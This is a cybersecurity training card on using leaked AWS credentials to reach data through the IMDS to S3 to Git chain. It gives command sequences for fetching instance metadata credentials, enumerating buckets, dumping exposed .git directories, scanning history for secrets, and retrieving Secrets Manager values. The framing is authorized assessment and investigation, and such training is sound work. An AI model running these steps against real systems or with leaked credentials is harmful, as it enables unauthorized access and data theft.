AWS S3 Bucket OSINT Enumeration: Public Bucket Discovery and Sensitive Data Identification

forensic_file_artifacts Difficulty 1–5 30 min certifiable

Theory

Why This Matters

The IMDS-to-S3-to-Git intelligence chain represents one of the most impactful credential exposure pathways in cloud environments. In the 2019 Capital One breach, an SSRF vulnerability allowed access to the AWS Instance Metadata Service (IMDS), yielding temporary IAM credentials that were used to enumerate and exfiltrate over 100 million customer records from S3. Beyond direct SSRF exploitation, threat intelligence analysts find IMDS-sourced credentials appearing in public breach databases, Pastebin dumps, and GitHub repositories — uploaded accidentally by developers who logged cloud environment variables. For investigators, the intelligence value lies in the chain: a single credential leak exposes not just one bucket but potentially entire code repositories, additional credential stores, and development secrets. This chain is also the starting point for assessing an organization's cloud security posture in authorized red team engagements.

Core Concept

The AWS Instance Metadata Service (IMDS) is an HTTP endpoint available to every EC2 instance at the link-local address 169.254.169.254. It provides instance identity documents, user data, and most critically, temporary IAM credentials associated with the instance's attached IAM role. Under IMDSv1, these credentials are served at http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME to any process that can send an HTTP GET from the instance, with no authentication. IMDSv2 (the hardened version) requires a session token, obtained via a PUT request, on every metadata request, including those to the credential endpoints, but many instances still accept IMDSv1 for application compatibility.

When IMDS credentials appear in breach data or public repositories, they arrive as a triplet: AccessKeyId, SecretAccessKey, and Token (the session token marking them as temporary STS credentials). Before any active use, analysts validate the credential with aws sts get-caller-identity — a read-only, low-risk API call that returns the IAM identity without touching any data. This is standard operational practice: it confirms credential validity and reveals the IAM role name and account ID, which guides further enumeration.
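The Arn value returned by aws sts get-caller-identity already encodes the account ID and the role name. As a minimal sketch of pulling those fields out for documentation, the helper below parses the common ARN shapes; the names parse_caller_arn and CallerIdentity are hypothetical and only cover the assumed-role, user, and role forms.

```python
import re
from typing import NamedTuple, Optional


class CallerIdentity(NamedTuple):
    """Fields recovered from a get-caller-identity ARN (hypothetical helper type)."""
    account_id: str
    principal_type: str      # "assumed-role", "user", or "role"
    name: str                # role or user name
    session: Optional[str]   # session name; only present for assumed roles


# Covers the standard partitions (aws, aws-cn, aws-us-gov) and a 12-digit account ID.
_ARN_RE = re.compile(
    r"^arn:aws[a-z-]*:(?:sts|iam)::(?P<account>\d{12}):"
    r"(?P<ptype>assumed-role|user|role)/(?P<rest>.+)$"
)


def parse_caller_arn(arn: str) -> CallerIdentity:
    """Split an ARN into account ID, principal type, name, and session."""
    m = _ARN_RE.match(arn)
    if m is None:
        raise ValueError(f"unrecognized ARN: {arn!r}")
    rest = m.group("rest")
    if m.group("ptype") == "assumed-role":
        # Shape: assumed-role/ROLE_NAME/SESSION_NAME
        name, _, session = rest.partition("/")
        return CallerIdentity(m.group("account"), "assumed-role", name, session or None)
    # IAM users and roles may carry a path; the name is the last segment.
    return CallerIdentity(m.group("account"), m.group("ptype"), rest.rsplit("/", 1)[-1], None)


if __name__ == "__main__":
    # Illustrative ARN only; the account ID and names are placeholders.
    print(parse_caller_arn("arn:aws:sts::123456789012:assumed-role/app-role/i-0abc123def4567890"))
```

For credentials issued through an EC2 instance profile, the session segment is typically the instance ID, which helps tie a leaked credential back to a specific host.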

S3 bucket enumeration with recovered credentials starts with aws s3 ls, which lists the buckets owned by the credential's account, provided the role holds s3:ListAllMyBuckets. A role without that permission may still have s3:ListBucket or s3:GetObject on specific buckets or paths, so bucket names learned elsewhere are worth testing directly. The key pivot is discovering S3 buckets containing git repositories: either raw .git directories uploaded by CI/CD pipelines, or .bundle files created by git bundle create. A .git directory in S3 can be downloaded and restored to a full repository with git clone.
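To illustrate the triage step, here is a small sketch that filters saved aws s3 ls --recursive output for repository and secret indicators. It assumes the usual four-column listing format (date, time, size, key); the function names and the indicator list are illustrative choices, not part of any tool.

```python
import re
from typing import List, Optional, Tuple

# Dots are escaped so that, for example, "digit/" does not match the ".git/" indicator.
INDICATORS = re.compile(
    r"(^|/)\.git/|\.bundle$|\.tar\.gz$|(^|/)\.env$|(^|/)id_rsa$|\.pem$|\.key$"
)


def parse_listing_line(line: str) -> Optional[Tuple[str, int]]:
    """Return (key, size) for an object line, or None for prefix or blank lines."""
    parts = line.rstrip("\r\n").split(None, 3)  # maxsplit keeps spaces inside keys
    if len(parts) < 4 or not parts[2].isdigit():
        return None
    return parts[3], int(parts[2])


def flag_interesting(listing: str) -> List[Tuple[str, int]]:
    """Collect objects whose key matches one of the indicator patterns."""
    hits = []
    for line in listing.splitlines():
        parsed = parse_listing_line(line)
        if parsed and INDICATORS.search(parsed[0]):
            hits.append(parsed)
    return hits
```

Working from a saved listing rather than re-running the command keeps the number of API calls against the bucket to a minimum.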

Exposed .git directories on web servers are a parallel discovery path. When a developer deploys by uploading their entire project directory including the .git folder, GET /.git/config returns the git remote URL, branch structure, and sometimes credentials. GitDump automates extraction: it fetches /.git/HEAD, /.git/config, /.git/COMMIT_EDITMSG, and all pack files, then reconstructs the repository locally. truffleHog scans recovered git history for high-entropy strings and known credential patterns across every commit, not just the current HEAD.
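The "high-entropy string" idea can be made concrete with Shannon entropy. The sketch below is a generic illustration of the heuristic, not truffleHog's actual implementation; the 20-character minimum length and the 4.0 bits-per-character threshold are assumptions chosen for the example.

```python
import math
import re
from collections import Counter
from typing import List


def shannon_entropy(s: str) -> float:
    """Shannon entropy of a string, in bits per character."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def high_entropy_tokens(text: str, min_len: int = 20, threshold: float = 4.0) -> List[str]:
    """Return base64-like tokens whose entropy meets the (assumed) threshold."""
    tokens = re.findall(r"[A-Za-z0-9+/=_-]{%d,}" % min_len, text)
    return [t for t in tokens if shannon_entropy(t) >= threshold]


if __name__ == "__main__":
    # The second value is the placeholder secret used in AWS documentation.
    blob = 'padding = "aaaaaaaaaaaaaaaaaaaaaaaa"\nsecret = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"'
    print(high_entropy_tokens(blob))
```

Entropy alone produces false positives (hashes, minified assets), which is why it is usually combined with known credential patterns such as key prefixes.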

Technical Deep-Dive

# IMDSv1 credential retrieval (for authorized testing / understanding the exposure)
# Step 1: Discover attached IAM role name
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Step 2: Retrieve temporary credentials
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
# Returns JSON with AccessKeyId, SecretAccessKey, Token, Expiration

# IMDSv2 (token-based):
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME

# Credential validation (ALWAYS first step — read-only, safe)
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...

aws sts get-caller-identity
# Returns: Account, UserId, Arn — confirms validity and reveals role name

# S3 enumeration with recovered credentials
aws s3 ls                        # List all accessible buckets
aws s3 ls s3://bucket-name/      # List bucket contents
aws s3 ls s3://bucket-name/ --recursive | grep -E '\.git/|\.bundle$|\.tar\.gz$'

# s3scanner: unauthenticated bucket permission assessment
pip install s3scanner
s3scanner scan --bucket company-backup
# Reports: exists, listable, readable, writable (without credentials)

# GitDump: extract exposed .git directory from web server
git clone https://github.com/Ebryx/GitDump.git
python3 GitDump/gitdump.py -u https://target.com/.git/ -o recovered_repo/
# Then restore as a git repo:
cd recovered_repo && git checkout -- .

# truffleHog: scan recovered git history for secrets
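# trufflehog emits one JSON object per line, so json.tool needs --json-lines (Python 3.8+)
trufflehog git file://./recovered_repo/ --json |
  python3 -m json.tool --json-lines | grep -E '"DetectorName"|"Raw"' | head -40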

# GitHub organization-wide secret scan (authorized)
trufflehog github --org=target-org --token=$GITHUB_TOKEN --json |
  python3 -m json.tool --json-lines | grep -E '"DetectorName"|"Repository"|"Raw"'

# Parse IMDS credential JSON from a breach dump entry
import json, datetime

raw = '''{
  "Code": "Success",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAQ3EXAMPLE12345",
  "SecretAccessKey": "wJalrXUtnFEMI/EXAMPLE/bPxRfiCYEXAMPLEKEY",
  "Token": "AQoXnyc4lcK4w==...",
  "Expiration": "2024-11-15T18:22:30Z"
}'''

creds = json.loads(raw)
exp = datetime.datetime.fromisoformat(creds["Expiration"].replace("Z", "+00:00"))
now = datetime.datetime.now(datetime.timezone.utc)
is_expired = now > exp
key_type = "temporary (STS/role)" if creds["AccessKeyId"].startswith("ASIA") else "long-term (IAM user)"
print(f"Key type  : {key_type}")
print(f"Expired   : {is_expired} (expiry: {exp})")
# ASIA prefix = temporary credentials from STS AssumeRole / IMDS
# AKIA prefix = long-term IAM user credentials (no expiry)

Intelligence Collection Methodology

Search breach data and public repositories: Query haveibeenpwned API for the organization's domain to identify known breaches. Search GitHub for ASIA (temporary AWS key prefix) with org:target-org scope. Use theHarvester to enumerate the organization's email domain, then cross-reference against credential leak databases.
Validate any discovered credentials safely: Set AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN environment variables and run aws sts get-caller-identity. This single read-only call confirms validity without modifying any resources. Log the IAM ARN returned for documentation.
Enumerate accessible S3 buckets: Run aws s3 ls with the recovered credentials. For each bucket, run aws s3 ls s3://bucket-name/ --recursive and grep for .git/, .bundle, .env, id_rsa, *.pem, *.key indicators.
Download and restore any discovered git repositories: Use aws s3 sync s3://bucket-name/.git/ ./recovered.git/ then git clone recovered.git/ restored_repo/. For web-exposed .git directories, use GitDump to reconstruct the repository from HTTP-accessible objects.
Scan all recovered git history: Run truffleHog over the entire git history (trufflehog git file://./restored_repo/) to identify secrets committed at any point in the repository's history, not just the current HEAD. Git history commonly contains credentials deleted from working files but still present in past commits.
Map the IAM permission boundary: Use Pacu (AWS exploitation framework, authorized use) or enumerate manually with aws iam get-role --role-name ROLE_NAME, aws iam list-role-policies --role-name ROLE_NAME (inline policies), and aws iam list-attached-role-policies --role-name ROLE_NAME (managed policies) to understand what the recovered role could access. This defines the scope of potential exposure.
Enumerate additional secret stores: From git history, extract any references to AWS Secrets Manager ARNs or SSM Parameter Store paths. Attempt retrieval with the recovered credentials: aws secretsmanager get-secret-value --secret-id SECRET_ARN.
Document the full chain: Record each hop: breach source → credential type (IMDS temporary vs IAM long-term) → IAM role ARN → accessible buckets → discovered repositories → secrets found in history. This chain of evidence is essential for incident reporting.
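The chain of evidence described in the final step can be kept as structured data from the start. The following is one possible sketch of such a record; the class names, field names, and sample values are hypothetical and would be adapted to whatever reporting format the engagement requires.

```python
import json
from dataclasses import asdict, dataclass, field
from typing import List


@dataclass
class Hop:
    """One link in the chain (hypothetical record layout)."""
    stage: str     # e.g. "breach source", "credential type", "IAM role ARN"
    finding: str   # what was observed at this stage
    evidence: str  # where it was observed (file, command output, URL)


@dataclass
class EvidenceChain:
    case_id: str
    hops: List[Hop] = field(default_factory=list)

    def add(self, stage: str, finding: str, evidence: str) -> "EvidenceChain":
        """Append a hop and return self so calls can be chained."""
        self.hops.append(Hop(stage, finding, evidence))
        return self

    def summary(self) -> str:
        """One-line view of the stages in the order they were recorded."""
        return " -> ".join(h.stage for h in self.hops)

    def to_json(self) -> str:
        """Serialize the whole chain for inclusion in an incident report."""
        return json.dumps(asdict(self), indent=2)


if __name__ == "__main__":
    chain = (
        EvidenceChain("CASE-001")  # placeholder case identifier
        .add("breach source", "credential triplet in paste", "paste_archive.txt")
        .add("credential type", "temporary (ASIA prefix)", "AccessKeyId field")
    )
    print(chain.summary())
    print(chain.to_json())
```

Recording each hop at the moment it is observed avoids reconstructing the sequence from memory when the report is written.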

Common Intelligence Collection Errors

Using recovered cloud credentials for active enumeration before validation: Running broad enumeration commands (e.g., aws s3 ls --recursive across all buckets) with unvalidated or expired credentials generates a burst of failed API calls that can be recorded in CloudTrail and may trigger security alerts. Always validate with aws sts get-caller-identity first, then scope enumeration to the minimum necessary.
Treating AKIA and ASIA key prefixes identically: AKIA prefixes indicate long-term IAM user credentials with no automatic expiration — extremely high severity. ASIA prefixes indicate temporary STS credentials with a defined expiration (visible in the Expiration field). Misclassifying one as the other leads to incorrect severity assessment.
Scanning only HEAD of a recovered git repository: A leaked credential has often been removed from the current HEAD by the time the repository is recovered, yet it remains in earlier commits. truffleHog's value is specifically in scanning every commit across all branches. git log --all --oneline and git stash list reveal additional commits and stashes to scan.
Missing .git directory exposure because it returns 403 on listing: Web servers may forbid directory listing of /.git/ while still serving individual files. Always test GET /.git/HEAD and GET /.git/config directly, as these files are frequently accessible even when directory listing is disabled.
Overlooking user data as a credential source: The IMDS user-data endpoint (/latest/user-data) contains the instance initialization script, in which developers frequently embed environment variables, including credentials. This is a separate endpoint from the IAM credentials endpoint and is often overlooked.
Assuming s3scanner output is definitive: s3scanner tests a fixed set of bucket-level permissions (list, read, write). Bucket or IAM policies may allow specific object-level operations (e.g., s3:GetObject on specific paths) that s3scanner's bucket-level checks do not reveal. Manual testing of specific paths is required after s3scanner flags a bucket.
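When testing /.git/HEAD directly, as recommended in the list above, a 200 response is not proof of exposure: many servers return a custom error page with status 200. A minimal sketch of a content check follows; it assumes the response body has already been fetched, and the function name looks_like_git_head is hypothetical.

```python
import re

# A real HEAD file is either a symbolic ref ("ref: refs/heads/main")
# or a detached commit hash (40 hex chars for SHA-1, 64 for SHA-256 repositories).
_SYMREF = re.compile(r"ref: refs/\S+")
_HASH = re.compile(r"[0-9a-f]{40}|[0-9a-f]{64}")


def looks_like_git_head(body: str) -> bool:
    """Return True only if the body has the shape of a genuine .git/HEAD file."""
    text = body.strip()
    return bool(_SYMREF.fullmatch(text) or _HASH.fullmatch(text))
```

Using fullmatch rather than a substring search rejects HTML error pages that merely happen to mention a ref name.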

NICE Framework Alignment

Code	Knowledge/Skill/Task Statement	How This Card Develops It
K0058	Knowledge of network protocols	Understanding HTTP link-local addressing for IMDS access and AWS S3 REST API structure for bucket enumeration
K0145	Knowledge of security assessment approaches	Executing a structured IMDS-to-S3-to-Git credential intelligence chain with defined validation and documentation steps
K0272	Knowledge of network security architecture	Mapping how IAM roles, instance profiles, temporary STS credentials, and S3 bucket policies interact to define the cloud credential attack surface
K0427	Knowledge of encryption algorithms	Distinguishing credential types by prefix (AKIA vs ASIA) and understanding STS token expiration as a security control; recognizing high-entropy string signatures that truffleHog uses to identify secrets
S0040	Skill in identifying and extracting data of interest from various sources	Extracting credentials from breach data, git history, and S3 bucket contents using truffleHog, GitDump, and aws CLI
T0569	Apply and utilize authorized cyber capabilities to achieve objectives	Deploying s3scanner, GitDump, truffleHog, and AWS CLI in authorized cloud intelligence collection engagements